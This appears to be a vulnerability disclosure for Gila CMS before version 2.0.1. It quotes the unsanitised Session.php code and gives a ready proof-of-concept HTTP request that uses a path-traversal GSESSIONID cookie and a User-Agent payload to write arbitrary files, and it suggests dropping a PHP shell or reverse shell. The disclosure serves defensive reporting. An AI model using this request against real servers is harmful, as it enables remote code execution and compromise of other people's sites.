Gila CMS (https://github.com/GilaCMS/gila) is an opensource CMS webapp. A vulnerability is found to upload arbitrary file by Gila CMS Session component for versions before 2.0.1, which may result in more serious issue.
Here we take Gila version 1.5.3 as example: https://github.com/GilaCMS/gila/tree/85e7052a90523127bb1759969fb180131e7de90d. Versions below 2.0.0 (including) are tested.
The problem is at Session.php: https://github.com/GilaCMS/gila/blob/85e7052a90523127bb1759969fb180131e7de90d/src/core/classes/Session.php, where the path is not properly filtered when saving session files. User can then pass data through User-Agent parameter and Cookie parameter.
public static function createFile($gsession)
{
$data = [
'user_agent'=>$_SERVER['HTTP_USER_AGENT']
];
file_put_contents(LOG_PATH.'/sessions/'.$gsession, json_encode($data));
}
After installation of the Gila CMS, user can craft the following network package in burp:
GET /gila/?c=admin HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../test.txt
This will result in creation of file test.txt at webapp home directory /var/www/html/gila directory. The Cookie parameter can be set to folders outside of web root /var/www/html as long as the web server has write access, which could definately result in more serious exploits. For instance, user can write <php shellexec() ?> into a .php file, or just use php reverse shell.